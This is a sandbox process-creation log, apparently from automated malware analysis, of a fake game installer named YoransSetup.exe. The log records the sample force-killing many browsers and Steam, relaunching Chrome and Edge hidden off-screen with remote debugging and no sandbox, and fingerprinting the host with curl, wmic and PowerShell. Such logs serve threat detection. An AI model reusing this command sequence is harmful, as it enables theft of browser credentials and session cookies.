Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductNameJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /FJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"Jump to behavior
